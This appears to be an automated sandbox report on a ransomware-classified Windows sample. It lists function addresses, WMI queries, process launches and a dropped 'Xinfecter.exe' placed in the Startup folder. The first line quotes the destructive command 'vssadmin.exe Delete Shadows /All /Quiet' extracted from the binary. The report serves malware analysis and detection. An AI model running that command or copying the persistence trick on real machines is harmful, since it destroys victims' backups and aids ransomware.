      Source: Xinfecter.exe.0.drBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet

      System Summary

      barindex
      Windows Scripting host queries suspicious COM object (likely to drop second stage)
      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
      Writes or reads registry keys via WMI
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AFC860: CreateFileW,DeviceIoControl,CloseHandle,0_2_00AFC860
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile created: C:\Windows\SysMain.sysJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile created: C:\Windows\SysMain.sysJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A940490_2_00A94049
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A9C1700_2_00A9C170
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A846700_2_00A84670
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A792A00_2_00A792A0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AB00800_2_00AB0080
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD81A00_2_00AD81A0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AE41100_2_00AE4110
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B042D40_2_00B042D4
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A802390_2_00A80239
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A882400_2_00A88240
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A883800_2_00A88380
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD84400_2_00AD8440
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00ADC7C50_2_00ADC7C5
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AE48D00_2_00AE48D0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A78A800_2_00A78A80
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B40B040_2_00B40B04
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AE4B700_2_00AE4B70
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AB8E900_2_00AB8E90
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AB0E000_2_00AB0E00
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B08E4A0_2_00B08E4A
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD4FA70_2_00AD4FA7
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD4FB40_2_00AD4FB4
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B18FE00_2_00B18FE0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00ADCF3F0_2_00ADCF3F
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AC12A00_2_00AC12A0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00ADD2C60_2_00ADD2C6
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B192520_2_00B19252
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD533B0_2_00AD533B
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A753300_2_00A75330
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AB54000_2_00AB5400
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B195C40_2_00B195C4
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00ADD5570_2_00ADD557
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AB16300_2_00AB1630
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B398790_2_00B39879
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B1986E0_2_00B1986E
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00ADD9900_2_00ADD990
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AE99080_2_00AE9908
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A89ABA0_2_00A89ABA
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A7DAB00_2_00A7DAB0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A8DAF00_2_00A8DAF0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A85AC00_2_00A85AC0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B19B350_2_00B19B35
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B31B710_2_00B31B71
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD5C840_2_00AD5C84
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B29CD00_2_00B29CD0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B19DF00_2_00B19DF0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD5EA80_2_00AD5EA8
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD62EB0_2_00AD62EB
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00ABA2C00_2_00ABA2C0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AC23C00_2_00AC23C0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD67460_2_00AD6746
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A8E8300_2_00A8E830
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B2E90D0_2_00B2E90D
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A86AF70_2_00A86AF7
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B06A580_2_00B06A58
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A8AF500_2_00A8AF50
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AB33000_2_00AB3300
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B2B47B0_2_00B2B47B
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B235A30_2_00B235A3
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AFF5F00_2_00AFF5F0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A8F5700_2_00A8F570
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B237D20_2_00B237D2
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B1B8170_2_00B1B817
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AE38600_2_00AE3860
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B03AE50_2_00B03AE5
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A7BA600_2_00A7BA60
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AE3C700_2_00AE3C70
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AB3E800_2_00AB3E80
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD7FA00_2_00AD7FA0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0003404948_2_00034049
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0003C17048_2_0003C170
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0002467048_2_00024670
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0005008048_2_00050080
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0008411048_2_00084110
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000781A048_2_000781A0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0002824048_2_00028240
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0005A2C048_2_0005A2C0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000A42D448_2_000A42D4
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000762EB48_2_000762EB
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0002838048_2_00028380
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000623C048_2_000623C0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0007844048_2_00078440
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000205AA48_2_000205AA
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0007674648_2_00076746
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0007C7C548_2_0007C7C5
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0002E83048_2_0002E830
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000848D048_2_000848D0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000CE90D48_2_000CE90D
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000269E048_2_000269E0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000A6A5848_2_000A6A58
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00018A8048_2_00018A80
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000E0B0448_2_000E0B04
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00084B7048_2_00084B70
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00050E0048_2_00050E00
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000A8E4A48_2_000A8E4A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00058E9048_2_00058E90
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0007CF3F48_2_0007CF3F
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0002AF5048_2_0002AF50
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00074FA748_2_00074FA7
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00074FB448_2_00074FB4
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000B8FE048_2_000B8FE0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000B925248_2_000B9252
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000192A048_2_000192A0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000612A048_2_000612A0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0007D2C648_2_0007D2C6
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0005330048_2_00053300
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0001533048_2_00015330
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0007533B48_2_0007533B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0005540048_2_00055400
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0007D55748_2_0007D557
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0002F57048_2_0002F570
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000C35A348_2_000C35A3
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000B95C448_2_000B95C4
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0009F5F048_2_0009F5F0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0005163048_2_00051630
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000C37D248_2_000C37D2
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000BB81748_2_000BB817
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000B986E48_2_000B986E
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0008386048_2_00083860
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000D987948_2_000D9879
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0008990848_2_00089908
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0007D99048_2_0007D990
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0001BA6048_2_0001BA60
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0001DAB048_2_0001DAB0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00029ABA48_2_00029ABA
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00025AC048_2_00025AC0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000A3AE548_2_000A3AE5
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0002DAF048_2_0002DAF0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000B9B3548_2_000B9B35
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000D1B7148_2_000D1B71
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00021B7F48_2_00021B7F
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00083C7048_2_00083C70
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00075C8448_2_00075C84
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000C9CD048_2_000C9CD0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000B9DF048_2_000B9DF0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000C7E4648_2_000C7E46
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00053E8048_2_00053E80
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00075EA848_2_00075EA8
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00077FA048_2_00077FA0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 000A15B1 appears 83 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 00041BD0 appears 69 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 000A1B70 appears 64 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 00041940 appears 31 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 00049B40 appears 64 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 000480D0 appears 33 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 000A157D appears 186 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 0004B8D0 appears 48 times
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: String function: 00B015B1 appears 83 times
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: String function: 00B00C3C appears 68 times
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: String function: 00AA9B40 appears 64 times
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: String function: 00AA80D0 appears 33 times
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: String function: 00AAB8D0 appears 48 times
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: String function: 00B01B70 appears 69 times
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: String function: 00B0157D appears 186 times
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: String function: 00AA1BD0 appears 69 times
      Source: BiXS3FRoLe.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.rans.troj.adwa.evad.winEXE@118/19@1/2
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A85920 PathIsNetworkPathA,__alloca_probe_16,MultiByteToWideChar,GetDiskFreeSpaceExW,0_2_00A85920
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5760:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7216:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: BiXS3FRoLe.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;8036&quot;::GetOwner
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;8036&quot;::GetOwner
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;92&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;324&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;408&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;484&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;492&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;552&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;620&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;628&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;752&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;776&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;784&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;872&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;924&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;984&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;360&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;356&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;772&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;792&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1040&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1092&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1108&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1172&quot;::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1216&quot;::GetOwner
